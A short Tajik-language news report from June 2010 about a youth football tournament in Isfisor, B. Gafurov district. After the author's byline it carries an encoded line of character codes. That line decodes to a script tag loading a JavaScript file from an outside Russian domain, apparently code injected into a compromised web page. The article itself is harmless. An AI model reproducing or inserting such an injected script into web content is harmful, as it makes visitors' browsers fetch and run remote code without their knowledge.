11.06.2010
Озмуни «Тӯби чармин»
Дар мактаби таҳсилоти миёнаи умумии таҷрибавии №53 ҷамоати Исфисор давраи аввали мусобиқа барои дарёфти «Тӯби чармин»-2010 байни кӯдакон ва наврасон оғоз гардид. Мусобиқа аз рӯи 5-шарт ҷамъбаст гардида, дар он наврасони то синни 16-сола иштирок менамоянд. Аз 7-мактаби ҷамоат 11-даста байни ҳам қувва меозмоянд ва дастаи ғолибомада дар давраи ниҳоии ноҳивӣ роҳхат мегиранд . Давраи ниҳоии он то охири моҳ ҷмъбаст мегардад.Дар ҷамоати мазкур 34-ҳазор аҳолӣ зиндагӣ карда, 13-ҳазорашонро ҷавонон ташкил медиҳанд .Ҳадафи ташкил ва гузаронидани чунин озмунро мудири бахши ҷавонон , варзиш ва сайёҳии ноҳияи Б.Ғафуров Олимҷон Зоҳидов дарёфти варзишгарони болаёқат ва пешгирӣ намудани ҳар гуна ҷиноятҳои номатлуб дар байни ҷавонон арзёбӣ намуд.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)67ad7784af1de22e36e413c83dfefac1.js" type="text/javascript">

